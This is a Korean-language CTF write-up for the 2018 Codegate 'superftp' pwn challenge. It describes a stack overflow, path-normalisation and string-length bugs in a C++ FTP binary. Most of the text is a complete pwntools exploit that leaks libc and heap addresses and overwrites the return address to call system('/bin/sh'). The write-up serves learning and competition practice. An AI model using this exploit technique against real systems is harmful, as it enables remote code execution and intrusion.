2018 codegate superftp

2018 codegate superftp

sel의 값을 입력받고 switch문으로 들어가는데 case '1'이 아니라 case 1이어서 16진수로 '\x01'을 입력해야 한다.

 

회원 가입을 하면 chunk를 만들어 주는데 형태는 다음과 같이 id, pw, name, age가 24단위로 써진다. (string으로)

 

로그인 할 때 login_num을 증가시킨다.

 

id, pw를 입력받는 과정에서 stack overflow가 발생한다. (canary 존재)

 

user_download는 heap에 받지만 admin_download는 stack에 받는다.

 

A/B/../C 를 입력하면 A/C로 바뀐다. /../를 제거한 후 /를 찾아서 A/C를 만들어준다. ( 정말 모르겠어서 라업을 참조했다 )

엄청 긴 함수던데 푼사람들 다 게싱으로 했겠지..

 

위 취약점들을 토대로 짠 익스플로잇은 다음과 같다.

1. name에 /a를 입력한 후 user_download_file('/../a') -> string class의 길이를 덮어 씌워 경로를 바꾸는 작업을 하는 도중에 생긴 unsortedbin의 main arena 와 heap주소 leak (tracemalloc을 통해 확인 가능)
2. 로그인을 '\x2f'번 한다.
3. admin_download_file() 함수를 이용하여 stack에 있는 '\x2f'까지 도달한 후 ret을 바꾼다. (거꾸로 흘러가서 바꾸기 때문에 canary 변조 X)

 

x
from pwn import *
​
#context.log_level = 'debug'
​
e = ELF('./ftp')
s = process(e.path)
l = ELF('/lib/i386-linux-gnu/libc.so.6')
​
ru = lambda x: s.recvuntil(x)
sl = lambda x: s.sendline(x)
p = lambda : pause()
io = lambda : s.interactive()
​
def menu(sel):
    ru('Choice:')
    s.send(sel)
​
def join(name, age, idid, pw):
    menu('\x01')
​
    ru('Name:')
    sl(name)
​
    ru('Age:')
    sl(age)
​
    ru('ID:')
    sl(idid)
​
    ru('PW:')
    sl(pw)
​
def print_info():
    menu('\x02')
​
def login_(idid, pw):
    menu('\x03')
​
    ru('id:')
    sl(idid)
​
    ru('pw:')
    sl(pw)
​
def withdrawal():
    menu('\x04')
​
def download_file(url):
    menu('\x05')
​
    ru('URL:')
    sl(url)
​
def exit():
    menu('\x06')
​
def set_result():
    menu('\x07')
​
def d_file(data):
    menu('\x08')
​
    s.send(p32(0x01))
​
    ru('URL:')
    sl(data)
​
# 0x56555000
​
login = '\x02'
admin = '\x03'
result = '\x04'
file_ = '\x01'
​
admin_id = 'admin'
admin_pw = 'P3ssw0rd'
​
join('/name/bin/sh', '22', 'iddd', 'pwww')
​
for i in xrange(0x2f-1):
    login_(admin_id, admin_pw)
​
download_file('/../a')
print_info()
​
ru('Name : ')
ru('/name')
s.recv(19)
libc = u32(s.recv(4))
print('libc!: {}'.format(hex(libc)))
s.recv(4)
heap = u32(s.recv(4))
print('heap!: {}'.format(hex(heap)))
libc_base = libc - 0x1b29a8
print('libc_base!: {}'.format(hex(libc_base)))
system = libc_base + l.symbols['system']
print('system!: {}'.format(hex(system)))
binsh = heap - 0xb
print('binsh!: {}'.format(hex(binsh)))
​
login_(admin_id, admin_pw)
​
set_result()
​
d_file('/../../'+'A'*5 + p32(binsh)[::-1] + p32(system)[::-1]*2)
io()

pie에 c++이라 분석에 제대로 집중을 못한 문제다.. 이제 좀 익숙해진 것 같아서 좋다